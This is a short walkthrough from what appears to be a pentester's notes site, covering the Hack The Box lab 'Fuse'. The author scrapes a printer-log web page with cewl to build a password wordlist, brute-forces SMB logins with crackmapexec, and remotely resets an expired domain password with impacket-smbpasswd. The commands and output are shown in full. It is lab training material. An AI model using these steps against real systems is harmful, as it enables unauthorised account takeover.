InfoSec LAB

Fuse_Custom_Wordlist

Created: 2 min read

Assessment

Up until this point, I have pretty much done EVERYTHING that I could think of and I couldn’t proceed further.

  • I tried checking for the NoPreAuthRequire with impacket-GetNPUsers and nothin returned.
  • I also tried brute-forcing passwords for each user with a relatively short list of passwords, and nothing returned.
  • I checked for other potential web apps by fuzzing, and nothing returned

Since the web server has the biggest attack surface as well as information available by far, I will attempt to parse it and make a custom wordlist out of it for brute-force attack

Custom Password List

┌──(kali㉿kali)-[~/archive/htb/labs/fuse]
└─$ cewl http://fuse.fabricorp.local/papercut/logs/html/index.htm --with-number > passwords

The whole idea is to extract sensitive credentials logged by users un-intentionally So I did scrape the whole web app to create a list of password and saved it to the passwords file

This would almost NEVER work in real life

Now that I have a list of valid username and potential passwords, I will try them all against the SMB server

Brute-Forcing

┌──(kali㉿kali)-[~/archive/htb/labs/fuse]
└─$ cme smb $IP -u users -p passwords --continue-on-success
smb         10.10.10.193    445    fuse             [*] windows server 2016 standard 14393 x64 (name:FUSE) (domain:fabricorp.local) (signing:True) (SMBv1:True)
 
[...REDASTED...]
 
smb         10.10.10.193    445    fuse             [-] fabricorp.local\bnielson:Fabricorp01 STATUS_PASSWORD_MUST_CHANGE 
 
[...REDACTED...]

i got one hit, bnielson:Fabricorp01

I remember that the bnielson user is supposed to be a new starter

But the responds a bit strange. It says that STATUS_PASSWORD_MUST_CHANGE

It turns out the author put a valid password on one of the printed documents and claimed that it is possible for someone to name a word document after his/her password, which is a complete garbage theory Fabrico01.docx is the document apparently

STATUS_PASSWORD_MUST_CHANGE  or STATUS_PASSWORD_EXPIRED

Upon searching it on Google, I found out that it is possible to reset passwords remotely over a SMB connection

Remote Password Reset

┌──(kali㉿kali)-[~/archive/htb/labs/fuse]
└─$ impacket-smbpasswd fabricorp.local/bnielson:Fabricorp01@$IP -newpass Qwer1234
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
 
[!] Password is expired, trying to bind with a null session.
[*] Password was changed successfully.

I’ve set the new password to Qwer1234 for the bnielson user

Now that we have a valid domain credential, I can start to further enumerate the AD environment

There likely is a script running in the background to expire & reset password of the bnielson user with an interval of 40-60 seconds Because I keep getting invalid credential error, so I would have to continue to change the password as I go along

Interactive Graph View

Backlinks